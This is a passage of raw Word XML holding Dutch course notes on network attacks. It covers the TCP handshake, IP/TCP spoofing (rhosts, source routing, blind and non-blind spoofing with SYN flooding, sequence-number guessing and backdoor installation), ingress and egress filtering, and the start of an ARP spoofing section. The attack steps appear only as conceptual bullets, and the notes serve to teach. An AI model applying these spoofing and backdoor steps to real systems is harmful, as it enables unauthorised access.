    <w:p w14:paraId="3EC66DEB" w14:textId="0ECD75A7" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Destination socket (IP/poort)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A529FE9" w14:textId="2E480742" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Data wordt in pakketten verstuurd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B27507F" w14:textId="0B9D74FC" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IP is een wrapper rond TCP(UDP) data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B30D7" w14:textId="20FBC33B" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Alle pakketten hebben een header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C2386E" w14:textId="38D990EC" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IP-header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757D7E28" w14:textId="56DBB999" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TCP-header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466C076F" w14:textId="396619E5" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TCP/IP maakt gebruik van de </w:t>
      </w:r>
      <w:r w:rsidRPr="00520FBD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Three Way Handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC479A" w14:textId="7487C779" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A stuurt een SYN naar B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B931F4B" w14:textId="64E343BC" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B stuurt een SYN/ACK terug naar A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E0499" w14:textId="1138DA8A" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A stuurt een ACK naar B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAA818C" w14:textId="4D248B37" w:rsidR="00520FBD" w:rsidRDefault="00520FBD" w:rsidP="00520FBD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De connectie is nu actief</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643CD38" w14:textId="77777777" w:rsidR="00462A60" w:rsidRDefault="00462A60" w:rsidP="001F6E7F"/>
    <w:p w14:paraId="3760569F" w14:textId="05E7F0A0" w:rsidR="001F6E7F" w:rsidRDefault="001F6E7F" w:rsidP="001F6E7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>TCP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06DBF4" w14:textId="77777777" w:rsidR="001F6E7F" w:rsidRDefault="001F6E7F" w:rsidP="001F6E7F"/>
    <w:p w14:paraId="5830F176" w14:textId="74559DB2" w:rsidR="001F6E7F" w:rsidRDefault="001F6E7F" w:rsidP="001F6E7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Geavanceerde techniek die pakketten van een bronadres vervalst om de machine te authenticeren bij een andere machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C13F2C8" w14:textId="77777777" w:rsidR="001F6E7F" w:rsidRDefault="001F6E7F" w:rsidP="001F6E7F"/>
    <w:p w14:paraId="6C1FE5DA" w14:textId="0C429D0D" w:rsidR="001F6E7F" w:rsidRDefault="001F6E7F" w:rsidP="001F6E7F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>RHOSTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC1CF83" w14:textId="77777777" w:rsidR="001F6E7F" w:rsidRDefault="001F6E7F" w:rsidP="001F6E7F"/>
    <w:p w14:paraId="728FA1A2" w14:textId="584826DC" w:rsidR="001F6E7F" w:rsidRDefault="001F6E7F" w:rsidP="001F6E7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ve</w:t>
      </w:r>
      <w:r w:rsidR="009D4349">
        <w:t>rouderde techniek die de RHOSTS-</w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="009D4349">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aangepast op Unix systemen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660994A7" w14:textId="5E60EF9A" w:rsidR="0014618B" w:rsidRDefault="00EE70D6" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Authenticatie</w:t>
      </w:r>
      <w:r w:rsidR="001F6E7F">
        <w:t xml:space="preserve"> op basis van IP, dus geen paswoorden!</w:t>
      </w:r>
      <w:r w:rsidR="009D176B">
        <w:t xml:space="preserve"> IP is makkelijk te vervalsen!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E1AA4" w14:textId="48144F45" w:rsidR="001F6E7F" w:rsidRDefault="0014618B" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Source Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D4C19C" w14:textId="77777777" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B"/>
    <w:p w14:paraId="4E31DC7D" w14:textId="1FA9A463" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Optie in IP-protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0427D2D8" w14:textId="4A141DD1" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Antwoord moet via een bepaalde route verstuurd worden (kan hacker zijn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C8C015" w14:textId="77777777" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B"/>
    <w:p w14:paraId="7961D98A" w14:textId="027EBED4" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Spoofing mechanisme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536B8D07" w14:textId="77777777" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B"/>
    <w:p w14:paraId="79A01B58" w14:textId="1554897C" w:rsidR="001F4C75" w:rsidRDefault="0014618B" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In de vorige 2 voorbeelden vervalst men enkel het IP-adres, dit is echt niet genoeg. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600E205B" w14:textId="25D9AFC0" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Er moet een dialoog zijn tussen beide machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED6D52C" w14:textId="35B8F65D" w:rsidR="001F4C75" w:rsidRDefault="001F4C75" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De hacker moet weten met welk sequentienummer de Server start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0F7796" w14:textId="77777777" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B"/>
    <w:p w14:paraId="526B79C0" w14:textId="002AA6CD" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Non-blind spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4DB719" w14:textId="77777777" w:rsidR="0014618B" w:rsidRDefault="0014618B" w:rsidP="0014618B"/>
    <w:p w14:paraId="637635DD" w14:textId="30905933" w:rsidR="0014618B" w:rsidRDefault="001F4C75" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP Poisining of IP Source Ratting attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D013B2" w14:textId="2CBAC295" w:rsidR="001F4C75" w:rsidRDefault="001F4C75" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Je ziet het antwoord van de server (en dus het sequentienummer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C7ABCB" w14:textId="66A89F04" w:rsidR="001F4C75" w:rsidRDefault="001F4C75" w:rsidP="0014618B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hacker gebruikt een sniffer om dit te doen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16402B" w14:textId="77777777" w:rsidR="001F4C75" w:rsidRDefault="001F4C75" w:rsidP="001F4C75"/>
    <w:p w14:paraId="1F267BF8" w14:textId="07F3991E" w:rsidR="001F4C75" w:rsidRDefault="001F4C75" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Blind Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226E9916" w14:textId="77777777" w:rsidR="001F4C75" w:rsidRDefault="001F4C75" w:rsidP="001F4C75"/>
    <w:p w14:paraId="2745C940" w14:textId="28B00ADA" w:rsidR="001F4C75" w:rsidRDefault="00427F76" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Beredeneerd gokken naar het sequentienummer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D15F4" w14:textId="40C112F6" w:rsidR="00427F76" w:rsidRDefault="00427F76" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De client laten inslapen, anders zal de server de communicatie resetten wegens voorgaande communicatie.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556FE56B" w14:textId="2D0441DE" w:rsidR="00427F76" w:rsidRDefault="00427F76" w:rsidP="001F4C75">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dit doet de hacker via SYN-flooding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A014015" w14:textId="4C5B3698" w:rsidR="00427F76" w:rsidRDefault="00427F76" w:rsidP="00427F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Heel veel aanvragen versturen naar een client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175FAC21" w14:textId="55705379" w:rsidR="00427F76" w:rsidRDefault="00427F76" w:rsidP="00427F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Client stuurt antwoord terug naar de hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BEBFE9" w14:textId="2702A69A" w:rsidR="00427F76" w:rsidRDefault="00427F76" w:rsidP="006E0A2D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hacker stuurt geen antwoord</w:t>
      </w:r>
      <w:r w:rsidR="006E0A2D">
        <w:t xml:space="preserve"> en blijft </w:t>
      </w:r>
      <w:r>
        <w:t>nieuwe aanvragen versturen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A328000" w14:textId="22567DEE" w:rsidR="00427F76" w:rsidRDefault="00427F76" w:rsidP="00427F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Client moet telkens wachten op een antwoord (dat er niet komt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF26D43" w14:textId="6B29DE16" w:rsidR="00427F76" w:rsidRDefault="00427F76" w:rsidP="00427F76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Client kan geen aanvragen meer verwerken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADADAA8" w14:textId="77777777" w:rsidR="00374100" w:rsidRDefault="00374100" w:rsidP="00374100"/>
    <w:p w14:paraId="69D7134D" w14:textId="1714584D" w:rsidR="00374100" w:rsidRDefault="00374100" w:rsidP="00374100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Het raden van het sequentienummer gebeurt door eerst te proefdraaien</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2CC87D" w14:textId="59FC36A7" w:rsidR="00374100" w:rsidRDefault="00374100" w:rsidP="00374100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Patroon herkennen in het sequentienummer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C433D" w14:textId="3BC9870D" w:rsidR="00374100" w:rsidRDefault="00374100" w:rsidP="00374100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Random Number Generator gebruiken om sequentienummer te raden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4EDB29" w14:textId="7F84F7AF" w:rsidR="00374100" w:rsidRDefault="00374100" w:rsidP="00374100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De hacker wil dit niet iedere keer herhalen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153A7AC8" w14:textId="5E959CF8" w:rsidR="00374100" w:rsidRDefault="00374100" w:rsidP="00374100">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Backdoor installeren op de server na de 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00374100">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>ste</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gelukte poging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332F7C4" w14:textId="3B40C593" w:rsidR="00367F1E" w:rsidRDefault="000635EE" w:rsidP="00367F1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Of r</w:t>
      </w:r>
      <w:r w:rsidR="00367F1E">
        <w:t>hosts file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aanpasse</w:t>
      </w:r>
      <w:r w:rsidR="00513BAE">
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36D5B7" w14:textId="04665F6B" w:rsidR="00367F1E" w:rsidRDefault="00367F1E" w:rsidP="00367F1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nadien kan de hacker gewoon inloggen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DB11BB" w14:textId="77777777" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12"/>
    <w:p w14:paraId="0222748A" w14:textId="26B3B95E" w:rsidR="00850E27" w:rsidRDefault="004D1C12" w:rsidP="006E0A2D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Algemene stappen geslaagde spoofing attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0029B727" w14:textId="77777777" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12"/>
    <w:p w14:paraId="5B640020" w14:textId="6388166F" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Doelwit identificeren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FA331F" w14:textId="5F7EB573" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source verdoven (SYN-flood)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D188EC" w14:textId="0210063D" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vervalsen van het Source IP-adres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B03F663" w14:textId="1F8AB2AA" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connectie maken de server als die Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCC1692" w14:textId="1BBAF5E9" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Non-blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4E326" w14:textId="23F62004" w:rsidR="004D1C12" w:rsidRDefault="004D1C12" w:rsidP="004D1C12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28930A53" w14:textId="77777777" w:rsidR="00812CA1" w:rsidRDefault="004D1C12" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Eenmaal binnen = backdoor maken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C58FB1" w14:textId="77777777" w:rsidR="00812CA1" w:rsidRDefault="00812CA1" w:rsidP="00812CA1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="115AA2CA" w14:textId="2BFFE373" w:rsidR="00BC1609" w:rsidRDefault="00BC1609" w:rsidP="00812CA1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>IP-spoofing voorkomen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B88BB2" w14:textId="77777777" w:rsidR="00BC1609" w:rsidRDefault="00BC1609" w:rsidP="00BC1609"/>
    <w:p w14:paraId="3CD4049B" w14:textId="3AD862E9" w:rsidR="00BC1609" w:rsidRDefault="00BC1609" w:rsidP="00BC1609">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ingress-filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD13AA" w14:textId="2201ED0D" w:rsidR="00BC1609" w:rsidRDefault="00BC1609" w:rsidP="00BC1609">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Blokkeren van pakketten die van buiten het netwerk komen, maar een intern IP hebben.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A574BC1" w14:textId="1360A155" w:rsidR="00BC1609" w:rsidRDefault="00BC1609" w:rsidP="00BC1609">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Egress-filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E087AF4" w14:textId="02F51224" w:rsidR="004C164F" w:rsidRDefault="00BC1609" w:rsidP="00DB278F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Blokkeren van pakketten die van het interne netwerk komen, maar een extern IP  als Source-IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85C577" w14:textId="0EC5B37E" w:rsidR="00300BE8" w:rsidRDefault="004C164F" w:rsidP="004C164F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ARP Spoofing/Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2A20D" w14:textId="77777777" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798"/>
    <w:p w14:paraId="609FAB35" w14:textId="2475301B" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP = Address Resolution Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AEBCF" w14:textId="60FCB50F" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Mapping van IP aan MAC-adres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766EFF21" w14:textId="77777777" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP Request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC32F5C" w14:textId="4A1F53DC" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= MAC-adres opvragen bij een host aan de hand van het IP-adres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072748DA" w14:textId="304A8824" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>= Broadcast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A98E918" w14:textId="77777777" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BAFC14" w14:textId="48248DC0" w:rsidR="00912798" w:rsidRDefault="00912798" w:rsidP="00912798">
      <w:pPr>
